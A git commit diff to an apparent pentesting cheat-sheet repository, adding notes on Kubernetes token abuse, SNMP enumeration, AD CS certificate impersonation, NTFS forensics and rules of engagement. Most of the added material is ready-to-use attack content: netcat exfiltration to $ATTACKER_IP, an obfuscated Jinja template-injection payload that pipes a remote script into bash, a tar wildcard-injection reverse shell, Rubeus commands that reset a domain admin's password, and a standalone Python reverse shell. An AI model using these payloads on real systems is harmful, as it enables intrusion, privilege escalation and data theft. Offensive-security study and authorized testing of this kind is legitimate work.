This commit is contained in:
Stefan Friese 2022-02-23 23:55:12 +01:00
parent 210ae2791c
commit d08a37a97d
12 changed files with 201 additions and 2 deletions

3
.gitmodules vendored
View File

@ -133,3 +133,6 @@
[submodule "misc/static-binaries"]
path = misc/static-binaries
url = https://github.com/andrew-d/static-binaries.git
[submodule "stego/stego-toolkit"]
path = stego/stego-toolkit
url = https://github.com/DominicBreuker/stego-toolkit.git

View File

@ -0,0 +1,37 @@
# Kubectl
```sh
kubectl get pods
```
* Check mounted secret
```sh
kubectl auth can-i --list
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get services
kubectl get ingress
kubectl get jobs
```
* Intel about a secret, and output
```sh
kubectl describe secrets <secret>
kubectl describe secrets <secret> -o 'json'
```
## Abuse Token
* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
* By change of an LFI extract the token and
```sh
kubectl auth can-i --list --token=$TOKEN
kubectl get pods --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
```
## Create Pods
* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
```sh
kubectl apply -f pod.yml --token=$TOKEN
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
```

View File

@ -0,0 +1,11 @@
# SNMP Enumeration
* Find community strings
```sh
onesixtyone $TARGET_IP -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt
```
* Query users
```
snmpwalk -v2c -c <community_string> $TARGET_IP 1.3.6.1.4.1.77.1.2.25
```

11
exfiltration/linux/nc.md Normal file
View File

@ -0,0 +1,11 @@
# Netcat
* RX
```sh
nc -lp 8080 > out.txt
```
* TX
```sh
nc $ATTACKER_IP 8080 < in.txt
```
* Have to be end manually after a while

View File

@ -0,0 +1,6 @@
# Evil-winrm
* Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp`
```sh
download C:\Windows\Temp\<file>
```

View File

@ -57,3 +57,8 @@ template = "User input is {{ input }}"
return render_template_string(template, input=input)
```
## Bypass
* Save reverse shell as `rev`
```sh
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl $ATTACKER_IP:8000/rev | bash")|attr("read")()}}
```

View File

@ -5,6 +5,12 @@
* cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed.
```sh
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
```
or
```sh
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"

48
forensics/ntfs.md Normal file
View File

@ -0,0 +1,48 @@
# NTFS
* Has the following advantages over FAT
* Journaling
* ACL
* Volume Shadow Copy
* Alternate Data Stream
## Master File Table
* VBR references to `$MFT`
* `$LOGFILE` stores transactions of the file system
* `$UsnJrnl` changed files, and reason for change
## Caching
* File information is cached for frequent use in
```sh
C:\Windows\Prefetch\*.pf
```
* An SQLite database can be found under
```sh
C:\Users\<username>\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db
```
## Jumplist
* Stores recently used files of applications inside the taskbar
```sh
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
```
## Shortcut Files
```sh
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\
C:\Users\<username>\AppData\Roaming\Microsoft\Office\Recent\
```
## Internet Explorer History
```sh
C:\Users\<username>\AppData\Local\Microsoft\Windows\WebCache\WebCacheV*.dat
```
## Removeable Device Setup Log
```sh
C:\Windows\inf\setupapi.dev.log
```

50
misc/AD_CS.md Normal file
View File

@ -0,0 +1,50 @@
## Active Directory Certificate Service ADCS
* Internal CA
* PKI
* File system encryption
* Digital signatures
* User authentication
* __Certificates will not be revoked after account password reset__
## Certificate Templates
* Extended/Enhanced Key Usage
* Parameter combination can be exploited
### Enumeration
* [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit)
```sh
certutil -v -template > ct.txt
```
Exploitable templates should have the following traits:
* `Allow Enroll` or `Allow Full Control` permissions to request certificate
* Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
* Client authentication EKU for Kerberos authentication --> `Client Authentication`
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
### Certificate Creation
* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
* After that in the main menu, `Certificates` --> right click on `Personal` --> `All Tasks` --> `Request Certificates` --> `Next` --> `Next` --> `More information is required to enroll this certificate` --> `Common Name` --> `CN=concerto` && `User Principal Name` is the user to impersonate --> `OK` --> select `User Request` --> `Enroll`
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
### Impersonation
* Request TGT with the created cert
* Grab TGT
* On the machine via
```sh
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain name> /dc:<IP of domain controller>
```
* Select a domain admin via opening `Active Directory Users and Computers`
```sh
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
```
* `runas /user:<domain>\<username of DA> cmd.exe`

View File

@ -1,10 +1,21 @@
# Pentesting
* [Pentesting Execution Standard](http://www.pentest-standard.org/index.php/Main_Page)
Authorized audit of security systems of computers and networks.
* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?)
* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?) and [redteam.guide ROEs](https://redteam.guide/docs/templates/roe_template/)
* Permissions
* Scope
* Engagement --> internal/external pentest or adversary emulation of APTs
* Scope --> networks, IPs, exfilration of data, which stage, downtime, DDoS
* Rules
* NDA
## Campaign
* [Checklist](https://redteam.guide/docs/checklists/red-team-checklist/)
* [vectr.io](https://vectr.io)
* Engagement --> Concept of Operations (CONOPS), Resource and Personnel Requirements, Timelines
* Operations --> Operators, Known Information, Responsibilities
* Mission --> Exact commands to run and execution time of the engagement
* Remediation --> Report, Remediation consultation
## Methodology

View File

@ -0,0 +1,10 @@
import os
import socket
import subprocess
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("#Target", 3000))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
import pty;pty.spawn("/bin/bash")

1
stego/stego-toolkit Submodule

@ -0,0 +1 @@
Subproject commit 4e6c2daf5ce08dfdbb9f9711f92f686eee3a6348